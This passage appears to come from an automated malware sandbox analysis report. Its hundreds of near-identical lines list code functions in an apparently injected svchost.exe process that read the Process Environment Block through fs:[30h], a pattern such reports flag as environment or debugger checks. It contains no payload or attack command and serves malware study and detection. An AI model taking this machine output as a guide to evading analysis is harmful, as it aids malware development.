            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E59C mov eax, dword ptr fs:[00000030h]2_2_0396E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov eax, dword ptr fs:[00000030h]2_2_03932582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov ecx, dword ptr fs:[00000030h]2_2_03932582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964588 mov eax, dword ptr fs:[00000030h]2_2_03964588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039365D0 mov eax, dword ptr fs:[00000030h]2_2_039365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039325E0 mov eax, dword ptr fs:[00000030h]2_2_039325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6500 mov eax, dword ptr fs:[00000030h]2_2_039C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA49A mov eax, dword ptr fs:[00000030h]2_2_039EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039644B0 mov ecx, dword ptr fs:[00000030h]2_2_039644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BA4B0 mov eax, dword ptr fs:[00000030h]2_2_039BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039364AB mov eax, dword ptr fs:[00000030h]2_2_039364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039304E5 mov ecx, dword ptr fs:[00000030h]2_2_039304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A430 mov eax, dword ptr fs:[00000030h]2_2_0396A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C427 mov eax, dword ptr fs:[00000030h]2_2_0392C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA456 mov eax, dword ptr fs:[00000030h]2_2_039EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392645D mov eax, dword ptr fs:[00000030h]2_2_0392645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395245A mov eax, dword ptr fs:[00000030h]2_2_0395245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC460 mov ecx, dword ptr fs:[00000030h]2_2_039BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEBD0 mov eax, dword ptr fs:[00000030h]2_2_039DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EBFC mov eax, dword ptr fs:[00000030h]2_2_0395EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCBF0 mov eax, dword ptr fs:[00000030h]2_2_039BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04B00 mov eax, dword ptr fs:[00000030h]2_2_03A04B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928B50 mov eax, dword ptr fs:[00000030h]2_2_03928B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEB50 mov eax, dword ptr fs:[00000030h]2_2_039DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB40 mov eax, dword ptr fs:[00000030h]2_2_039FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8B42 mov eax, dword ptr fs:[00000030h]2_2_039D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392CB7E mov eax, dword ptr fs:[00000030h]2_2_0392CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968A90 mov edx, dword ptr fs:[00000030h]2_2_03968A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04A80 mov eax, dword ptr fs:[00000030h]2_2_03A04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986AA4 mov eax, dword ptr fs:[00000030h]2_2_03986AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930AD0 mov eax, dword ptr fs:[00000030h]2_2_03930AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCA11 mov eax, dword ptr fs:[00000030h]2_2_039BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA38 mov eax, dword ptr fs:[00000030h]2_2_0396CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA24 mov eax, dword ptr fs:[00000030h]2_2_0396CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EA2E mov eax, dword ptr fs:[00000030h]2_2_0395EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEA60 mov eax, dword ptr fs:[00000030h]2_2_039DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov esi, dword ptr fs:[00000030h]2_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]2_2_039309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]2_2_039309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039649D0 mov eax, dword ptr fs:[00000030h]2_2_039649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA9D3 mov eax, dword ptr fs:[00000030h]2_2_039FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C69C0 mov eax, dword ptr fs:[00000030h]2_2_039C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]2_2_039629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]2_2_039629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE9E0 mov eax, dword ptr fs:[00000030h]2_2_039BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC912 mov eax, dword ptr fs:[00000030h]2_2_039BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]2_2_03928918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]2_2_03928918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]2_2_039AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]2_2_039AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B892A mov eax, dword ptr fs:[00000030h]2_2_039B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C892B mov eax, dword ptr fs:[00000030h]2_2_039C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0946 mov eax, dword ptr fs:[00000030h]2_2_039B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04940 mov eax, dword ptr fs:[00000030h]2_2_03A04940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]2_2_039D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]2_2_039D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC97C mov eax, dword ptr fs:[00000030h]2_2_039BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]2_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov edx, dword ptr fs:[00000030h]2_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]2_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC89D mov eax, dword ptr fs:[00000030h]2_2_039BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930887 mov eax, dword ptr fs:[00000030h]2_2_03930887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E8C0 mov eax, dword ptr fs:[00000030h]2_2_0395E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A008C0 mov eax, dword ptr fs:[00000030h]2_2_03A008C0
